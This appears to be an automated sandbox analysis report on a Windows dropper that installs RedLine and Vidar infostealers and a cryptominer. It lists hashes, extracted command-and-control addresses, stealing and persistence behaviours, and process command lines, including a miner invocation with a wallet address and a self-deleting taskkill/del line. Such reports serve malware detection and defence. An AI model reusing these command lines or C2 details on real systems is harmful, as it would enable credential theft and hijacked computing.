Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-09-2022 20:51

General

  • Target

    file.exe

  • Size

    206KB

  • MD5

    6e2cdfe740807c1cc60eec6073e0e8cd

  • SHA1

    c96f8a90c6d6724aad13d7e3eb30ff04d68f284f

  • SHA256

    45a7548caefdaba416661503999d6f303b34df6ff1986dea142fcc59649888f8

  • SHA512

    12cd8dd5f1c9b4e9e6833bf0a129c227fab1563921e223d5f0efabf732cac04add2b248f51634512e658ccc9aceb54534f97082057db30771c21f3283c5230b8

  • SSDEEP

    3072:f0cwXTxous8CC127+fBc9stVT6lnldlkpAUIfbDzV2aaoUXL1gC7DRxeGYlbWa3D:kBd12FyfTXpQJ4zhxeEm

Malware Config

Extracted

Family

redline

Botnet

Lyla.22.09

C2

185.215.113.216:21921

Attributes
  • auth_value

    2f19888cb6bad7fdc46df91dc06aacc5

Extracted

Family

vidar

Version

54.6

Botnet

1680

C2

https://t.me/huobiinside

https://mas.to/@kyriazhs1975

Attributes
  • profile_id

    1680

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Detectes Phoenix Miner Payload 4 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 10 IoCs
  • VMProtect packed file 4 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:2352
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Roaming\explorer\explorer.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1772
      • C:\Users\Admin\AppData\Roaming\explorer\explorer.exe
        C:\Users\Admin\AppData\Roaming\explorer\explorer.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4132
        • C:\Users\Admin\AppData\Roaming\explorer\svchost.exe
          -pool us-etc.2miners.com:1010 -wal 0xB7b2553E9b6DC10186ddD09AB9fbE71C68da0851.ferms -epsw x -mode 1 -log 0 -mport 0 -etha 0 -ftime 55 -retrydelay 1 -coin etc
          4⤵
          • Executes dropped EXE
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:4228
    • C:\Users\Admin\AppData\Local\Temp\K2AC09658F065IF.exe
      "C:\Users\Admin\AppData\Local\Temp\K2AC09658F065IF.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:4056
      • C:\Users\Admin\AppData\Local\Temp\K2AC09658F065IF.exe
        "C:\Users\Admin\AppData\Local\Temp\K2AC09658F065IF.exe"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Loads dropped DLL
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4504
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" P0jÒkÈJ¦otq”tq”/c taskkill /im K2AC09658F065IF.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\K2AC09658F065IF.exe" & del C:\PrograData\*.dll & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3672
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /im K2AC09658F065IF.exe /f
            5⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4704
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 6
            5⤵
            • Delays execution with timeout.exe
            PID:5104
    • C:\Users\Admin\AppData\Local\Temp\IA7CD12FDFM9C17.exe
      "C:\Users\Admin\AppData\Local\Temp\IA7CD12FDFM9C17.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:3548
      • C:\Users\Admin\AppData\Local\Temp\IA7CD12FDFM9C17.exe
        "C:\Users\Admin\AppData\Local\Temp\IA7CD12FDFM9C17.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3764
    • C:\Users\Admin\AppData\Local\Temp\GI9I071B1A5125E.exe
      "C:\Users\Admin\AppData\Local\Temp\GI9I071B1A5125E.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:2100
      • C:\Users\Admin\AppData\Local\Temp\GI9I071B1A5125E.exe
        "C:\Users\Admin\AppData\Local\Temp\GI9I071B1A5125E.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of AdjustPrivilegeToken
        PID:5116
    • C:\Users\Admin\AppData\Local\Temp\J50I0LIG15ACMGD.exe
      "C:\Users\Admin\AppData\Local\Temp\J50I0LIG15ACMGD.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4196
      • C:\Windows\SysWOW64\regsvr32.exe
        "C:\Windows\System32\regsvr32.exe" 1SP6.bQ -s
        3⤵
        • Loads dropped DLL
        PID:2716
    • C:\Users\Admin\AppData\Local\Temp\J50I0LIG15ACMGD.exe
      https://iplogger.org/1x5az7
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4512
      • C:\Windows\SysWOW64\regsvr32.exe
        "C:\Windows\System32\regsvr32.exe" 1SP6.bQ -s
        3⤵
        • Loads dropped DLL
        PID:1832

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

1
T1112

Credential Access

Credentials in Files

3
T1081

Discovery

Query Registry

3
T1012

System Information Discovery

3
T1082

Collection

Data from Local System

3
T1005

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\mozglue.dll
    Filesize

    593KB

    MD5

    c8fd9be83bc728cc04beffafc2907fe9

    SHA1

    95ab9f701e0024cedfbd312bcfe4e726744c4f2e

    SHA256

    ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

    SHA512

    fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

  • C:\ProgramData\nss3.dll
    Filesize

    2.0MB

    MD5

    1cc453cdf74f31e4d913ff9c10acdde2

    SHA1

    6e85eae544d6e965f15fa5c39700fa7202f3aafe

    SHA256

    ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

    SHA512

    dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GI9I071B1A5125E.exe.log
    Filesize

    42B

    MD5

    84cfdb4b995b1dbf543b26b86c863adc

    SHA1

    d2f47764908bf30036cf8248b9ff5541e2711fa2

    SHA256

    d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b

    SHA512

    485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IA7CD12FDFM9C17.exe.log
    Filesize

    42B

    MD5

    84cfdb4b995b1dbf543b26b86c863adc

    SHA1

    d2f47764908bf30036cf8248b9ff5541e2711fa2

    SHA256

    d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b

    SHA512

    485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce

  • C:\Users\Admin\AppData\Local\Temp\1SP6.bQ
    Filesize

    1.9MB

    MD5

    55560381faf0f0928241f11bb3e198d6

    SHA1

    22b3ded4148b1c21e64ad0a18f546fd920facf16

    SHA256

    c198bc8ea48a4afee6f4707dbd93b854a339099a2b25fe2ce65814ef89150340

    SHA512

    bc7b835a0d7de3e6c4bf979b1adbf22e780f852d56a2a5ff65b020a3582fdccea53656e7f74aa6d36c3406fdef0dc23496ad3d1b5dac1680291d1b7b408562b0

  • C:\Users\Admin\AppData\Local\Temp\1sP6.bQ
    Filesize

    1.9MB

    MD5

    55560381faf0f0928241f11bb3e198d6

    SHA1

    22b3ded4148b1c21e64ad0a18f546fd920facf16

    SHA256

    c198bc8ea48a4afee6f4707dbd93b854a339099a2b25fe2ce65814ef89150340

    SHA512

    bc7b835a0d7de3e6c4bf979b1adbf22e780f852d56a2a5ff65b020a3582fdccea53656e7f74aa6d36c3406fdef0dc23496ad3d1b5dac1680291d1b7b408562b0

  • C:\Users\Admin\AppData\Local\Temp\1sP6.bQ
    Filesize

    1.9MB

    MD5

    55560381faf0f0928241f11bb3e198d6

    SHA1

    22b3ded4148b1c21e64ad0a18f546fd920facf16

    SHA256

    c198bc8ea48a4afee6f4707dbd93b854a339099a2b25fe2ce65814ef89150340

    SHA512

    bc7b835a0d7de3e6c4bf979b1adbf22e780f852d56a2a5ff65b020a3582fdccea53656e7f74aa6d36c3406fdef0dc23496ad3d1b5dac1680291d1b7b408562b0

  • C:\Users\Admin\AppData\Local\Temp\1sP6.bQ
    Filesize

    1.9MB

    MD5

    55560381faf0f0928241f11bb3e198d6

    SHA1

    22b3ded4148b1c21e64ad0a18f546fd920facf16

    SHA256

    c198bc8ea48a4afee6f4707dbd93b854a339099a2b25fe2ce65814ef89150340

    SHA512

    bc7b835a0d7de3e6c4bf979b1adbf22e780f852d56a2a5ff65b020a3582fdccea53656e7f74aa6d36c3406fdef0dc23496ad3d1b5dac1680291d1b7b408562b0

  • C:\Users\Admin\AppData\Local\Temp\GI9I071B1A5125E.exe
    Filesize

    408KB

    MD5

    85fa84ce1cea24686f8426c846266121

    SHA1

    32a62d7e35d8bfed1bae24ae3b9adce5955529c5

    SHA256

    621138685d13638a0ec064ca8b1858198116c6699c02eff23fd1d0a841917e4a

    SHA512

    bfe82e744a4fe8b46f4bedb5ad8b8be86fd589cd3aeabb29e9ea41023754d2982350670b61bb19aea214dcdfae6b1abc9edb31da8681c13bdd895d544388ec75

  • C:\Users\Admin\AppData\Local\Temp\GI9I071B1A5125E.exe
    Filesize

    408KB

    MD5

    85fa84ce1cea24686f8426c846266121

    SHA1

    32a62d7e35d8bfed1bae24ae3b9adce5955529c5

    SHA256

    621138685d13638a0ec064ca8b1858198116c6699c02eff23fd1d0a841917e4a

    SHA512

    bfe82e744a4fe8b46f4bedb5ad8b8be86fd589cd3aeabb29e9ea41023754d2982350670b61bb19aea214dcdfae6b1abc9edb31da8681c13bdd895d544388ec75

  • C:\Users\Admin\AppData\Local\Temp\GI9I071B1A5125E.exe
    Filesize

    408KB

    MD5

    85fa84ce1cea24686f8426c846266121

    SHA1

    32a62d7e35d8bfed1bae24ae3b9adce5955529c5

    SHA256

    621138685d13638a0ec064ca8b1858198116c6699c02eff23fd1d0a841917e4a

    SHA512

    bfe82e744a4fe8b46f4bedb5ad8b8be86fd589cd3aeabb29e9ea41023754d2982350670b61bb19aea214dcdfae6b1abc9edb31da8681c13bdd895d544388ec75

  • C:\Users\Admin\AppData\Local\Temp\IA7CD12FDFM9C17.exe
    Filesize

    481KB

    MD5

    20585a9206f748dba754f099434f7628

    SHA1

    e55f5ed8987887693a393d6dd1600a5bd7a45461

    SHA256

    b1c40ded5b798303fc9ee12e12f58ed66288f87b952812aff63b9c0cf0e07811

    SHA512

    50dbbcac963a60d4e3a9acf1ddf55170771158ef1e54bb624ac25679d6168128cfab6fd492e64926e25fd98c64c507210a7ef8d3463097756e9924b87178721c

  • C:\Users\Admin\AppData\Local\Temp\IA7CD12FDFM9C17.exe
    Filesize

    481KB

    MD5

    20585a9206f748dba754f099434f7628

    SHA1

    e55f5ed8987887693a393d6dd1600a5bd7a45461

    SHA256

    b1c40ded5b798303fc9ee12e12f58ed66288f87b952812aff63b9c0cf0e07811

    SHA512

    50dbbcac963a60d4e3a9acf1ddf55170771158ef1e54bb624ac25679d6168128cfab6fd492e64926e25fd98c64c507210a7ef8d3463097756e9924b87178721c

  • C:\Users\Admin\AppData\Local\Temp\IA7CD12FDFM9C17.exe
    Filesize

    481KB

    MD5

    20585a9206f748dba754f099434f7628

    SHA1

    e55f5ed8987887693a393d6dd1600a5bd7a45461

    SHA256

    b1c40ded5b798303fc9ee12e12f58ed66288f87b952812aff63b9c0cf0e07811

    SHA512

    50dbbcac963a60d4e3a9acf1ddf55170771158ef1e54bb624ac25679d6168128cfab6fd492e64926e25fd98c64c507210a7ef8d3463097756e9924b87178721c

  • C:\Users\Admin\AppData\Local\Temp\J50I0LIG15ACMGD.exe
    Filesize

    2.0MB

    MD5

    94be040ad3892502560dfbd9d14adfdc

    SHA1

    2183ae23c9802e8dda4f8a50ba6cef077de5a07c

    SHA256

    14d4fc388f672efad43e9b49ce9c4ceab030ac212603610a48bb30a8eb6f6ce4

    SHA512

    ad04ea985b6c2621d7f2e433428d1c8003e790196ba311c978760f816339128615a07b7725fe83a0b94f347a36692b0d0d22b8a4522dc719c07779d390796d09

  • C:\Users\Admin\AppData\Local\Temp\J50I0LIG15ACMGD.exe
    Filesize

    2.0MB

    MD5

    94be040ad3892502560dfbd9d14adfdc

    SHA1

    2183ae23c9802e8dda4f8a50ba6cef077de5a07c

    SHA256

    14d4fc388f672efad43e9b49ce9c4ceab030ac212603610a48bb30a8eb6f6ce4

    SHA512

    ad04ea985b6c2621d7f2e433428d1c8003e790196ba311c978760f816339128615a07b7725fe83a0b94f347a36692b0d0d22b8a4522dc719c07779d390796d09

  • C:\Users\Admin\AppData\Local\Temp\J50I0LIG15ACMGD.exe
    Filesize

    2.0MB

    MD5

    94be040ad3892502560dfbd9d14adfdc

    SHA1

    2183ae23c9802e8dda4f8a50ba6cef077de5a07c

    SHA256

    14d4fc388f672efad43e9b49ce9c4ceab030ac212603610a48bb30a8eb6f6ce4

    SHA512

    ad04ea985b6c2621d7f2e433428d1c8003e790196ba311c978760f816339128615a07b7725fe83a0b94f347a36692b0d0d22b8a4522dc719c07779d390796d09

  • C:\Users\Admin\AppData\Local\Temp\K2AC09658F065IF.exe
    Filesize

    669KB

    MD5

    0d6804e83ff5775c4f6a162c9761c7e2

    SHA1

    6eb877d9710253e460d5d697962cb660118c5533

    SHA256

    78fd273090d2697ec2d7bf6b2d300413dc92d6f25c05443e80e7d3f0f9d8867c

    SHA512

    20c2aafb91cfa8b05152c451901342514b6290ae8351e830fbf1f696352b0fbc26d5b9960da88c02f7b6a08afb221b22b17c36253ddd84def413ba0798f83ea0

  • C:\Users\Admin\AppData\Local\Temp\K2AC09658F065IF.exe
    Filesize

    669KB

    MD5

    0d6804e83ff5775c4f6a162c9761c7e2

    SHA1

    6eb877d9710253e460d5d697962cb660118c5533

    SHA256

    78fd273090d2697ec2d7bf6b2d300413dc92d6f25c05443e80e7d3f0f9d8867c

    SHA512

    20c2aafb91cfa8b05152c451901342514b6290ae8351e830fbf1f696352b0fbc26d5b9960da88c02f7b6a08afb221b22b17c36253ddd84def413ba0798f83ea0

  • C:\Users\Admin\AppData\Local\Temp\K2AC09658F065IF.exe
    Filesize

    669KB

    MD5

    0d6804e83ff5775c4f6a162c9761c7e2

    SHA1

    6eb877d9710253e460d5d697962cb660118c5533

    SHA256

    78fd273090d2697ec2d7bf6b2d300413dc92d6f25c05443e80e7d3f0f9d8867c

    SHA512

    20c2aafb91cfa8b05152c451901342514b6290ae8351e830fbf1f696352b0fbc26d5b9960da88c02f7b6a08afb221b22b17c36253ddd84def413ba0798f83ea0

  • C:\Users\Admin\AppData\Roaming\explorer\explorer.exe
    Filesize

    17KB

    MD5

    d9e2fc3a247db17e03d220092e4756ff

    SHA1

    c409057b469fcefe230ee170a5b2bc33d3bb28ec

    SHA256

    ee36cfc26f2b4205cf7de07cd257af6d1d992919e58047ec7a4fdd6cf70140dd

    SHA512

    b973884a248e162dd7f83d981d6c7774eb21bce3983012474799b9b96f18846d60a2995cc82d4f7c362d4495626d36f6f39ff76d22c806b755c7cb2c7bfcb4af

  • C:\Users\Admin\AppData\Roaming\explorer\explorer.exe
    Filesize

    17KB

    MD5

    d9e2fc3a247db17e03d220092e4756ff

    SHA1

    c409057b469fcefe230ee170a5b2bc33d3bb28ec

    SHA256

    ee36cfc26f2b4205cf7de07cd257af6d1d992919e58047ec7a4fdd6cf70140dd

    SHA512

    b973884a248e162dd7f83d981d6c7774eb21bce3983012474799b9b96f18846d60a2995cc82d4f7c362d4495626d36f6f39ff76d22c806b755c7cb2c7bfcb4af

  • C:\Users\Admin\AppData\Roaming\explorer\svchost.exe
    Filesize

    9.7MB

    MD5

    afe1d7271ec50bf3332edf6ba5f8ba01

    SHA1

    b07633f2274ffc7d8f02fdca4da94aec88534b0c

    SHA256

    d645e1c6408572a8e4e7e20e099a8301a6b811131a00bc8b28ca97a4ec951222

    SHA512

    9e1248618a54956f0b9d455e33eb63fbeeb5c3b16ee168d5f5c002eac9863568f844ed0b47ec1eb9bb452e6e63e7784eebb76693e90e5789c94f0193a9e0737a

  • C:\Users\Admin\AppData\Roaming\explorer\svchost.exe
    Filesize

    9.7MB

    MD5

    afe1d7271ec50bf3332edf6ba5f8ba01

    SHA1

    b07633f2274ffc7d8f02fdca4da94aec88534b0c

    SHA256

    d645e1c6408572a8e4e7e20e099a8301a6b811131a00bc8b28ca97a4ec951222

    SHA512

    9e1248618a54956f0b9d455e33eb63fbeeb5c3b16ee168d5f5c002eac9863568f844ed0b47ec1eb9bb452e6e63e7784eebb76693e90e5789c94f0193a9e0737a

  • memory/1772-132-0x0000000000000000-mapping.dmp
  • memory/1832-212-0x0000000002240000-0x0000000002431000-memory.dmp
    Filesize

    1.9MB

  • memory/1832-235-0x00000000029F0000-0x0000000002B2D000-memory.dmp
    Filesize

    1.2MB

  • memory/1832-206-0x0000000000000000-mapping.dmp
  • memory/1832-224-0x0000000002770000-0x00000000028B0000-memory.dmp
    Filesize

    1.2MB

  • memory/1832-231-0x0000000002C00000-0x0000000002CB4000-memory.dmp
    Filesize

    720KB

  • memory/1832-230-0x0000000002B30000-0x0000000002BFC000-memory.dmp
    Filesize

    816KB

  • memory/1832-225-0x00000000029F0000-0x0000000002B2D000-memory.dmp
    Filesize

    1.2MB

  • memory/2100-168-0x0000000000000000-mapping.dmp
  • memory/2100-172-0x0000000000790000-0x00000000007FA000-memory.dmp
    Filesize

    424KB

  • memory/2716-227-0x0000000003590000-0x0000000003644000-memory.dmp
    Filesize

    720KB

  • memory/2716-226-0x00000000034B0000-0x000000000357C000-memory.dmp
    Filesize

    816KB

  • memory/2716-234-0x0000000003370000-0x00000000034AD000-memory.dmp
    Filesize

    1.2MB

  • memory/2716-207-0x0000000000000000-mapping.dmp
  • memory/2716-222-0x00000000030F0000-0x0000000003230000-memory.dmp
    Filesize

    1.2MB

  • memory/2716-223-0x0000000003370000-0x00000000034AD000-memory.dmp
    Filesize

    1.2MB

  • memory/3548-151-0x00000000007B0000-0x000000000082D000-memory.dmp
    Filesize

    500KB

  • memory/3548-148-0x0000000000000000-mapping.dmp
  • memory/3672-213-0x0000000000000000-mapping.dmp
  • memory/3764-218-0x0000000007270000-0x000000000779C000-memory.dmp
    Filesize

    5.2MB

  • memory/3764-167-0x00000000053A0000-0x00000000054AA000-memory.dmp
    Filesize

    1.0MB

  • memory/3764-152-0x0000000000000000-mapping.dmp
  • memory/3764-153-0x0000000000E00000-0x0000000000E1C000-memory.dmp
    Filesize

    112KB

  • memory/3764-165-0x00000000057D0000-0x0000000005DE8000-memory.dmp
    Filesize

    6.1MB

  • memory/3764-181-0x0000000005740000-0x00000000057A6000-memory.dmp
    Filesize

    408KB

  • memory/3764-166-0x0000000005270000-0x0000000005282000-memory.dmp
    Filesize

    72KB

  • memory/3764-219-0x0000000006AE0000-0x0000000006B30000-memory.dmp
    Filesize

    320KB

  • memory/3764-217-0x0000000006B70000-0x0000000006D32000-memory.dmp
    Filesize

    1.8MB

  • memory/3764-170-0x00000000052D0000-0x000000000530C000-memory.dmp
    Filesize

    240KB

  • memory/3764-215-0x0000000006250000-0x000000000626E000-memory.dmp
    Filesize

    120KB

  • memory/3764-214-0x0000000006300000-0x0000000006376000-memory.dmp
    Filesize

    472KB

  • memory/4056-144-0x0000000000000000-mapping.dmp
  • memory/4056-147-0x00000000008B0000-0x000000000095C000-memory.dmp
    Filesize

    688KB

  • memory/4132-133-0x0000000000000000-mapping.dmp
  • memory/4196-199-0x0000000000000000-mapping.dmp
  • memory/4228-139-0x00007FF78BEC0000-0x00007FF78D417000-memory.dmp
    Filesize

    21.3MB

  • memory/4228-136-0x0000000000000000-mapping.dmp
  • memory/4228-143-0x00007FF78BEC0000-0x00007FF78D417000-memory.dmp
    Filesize

    21.3MB

  • memory/4504-161-0x0000000001300000-0x000000000135B000-memory.dmp
    Filesize

    364KB

  • memory/4504-179-0x0000000061E00000-0x0000000061EF3000-memory.dmp
    Filesize

    972KB

  • memory/4504-164-0x0000000001300000-0x000000000135B000-memory.dmp
    Filesize

    364KB

  • memory/4504-156-0x0000000001300000-0x000000000135B000-memory.dmp
    Filesize

    364KB

  • memory/4504-155-0x0000000000000000-mapping.dmp
  • memory/4512-204-0x0000000000000000-mapping.dmp
  • memory/4704-216-0x0000000000000000-mapping.dmp
  • memory/5104-220-0x0000000000000000-mapping.dmp
  • memory/5116-173-0x0000000000000000-mapping.dmp
  • memory/5116-178-0x00000000061B0000-0x0000000006242000-memory.dmp
    Filesize

    584KB

  • memory/5116-189-0x0000000006370000-0x000000000637A000-memory.dmp
    Filesize

    40KB

  • memory/5116-177-0x0000000006670000-0x0000000006C14000-memory.dmp
    Filesize

    5.6MB

  • memory/5116-174-0x0000000000F40000-0x0000000000F4A000-memory.dmp
    Filesize

    40KB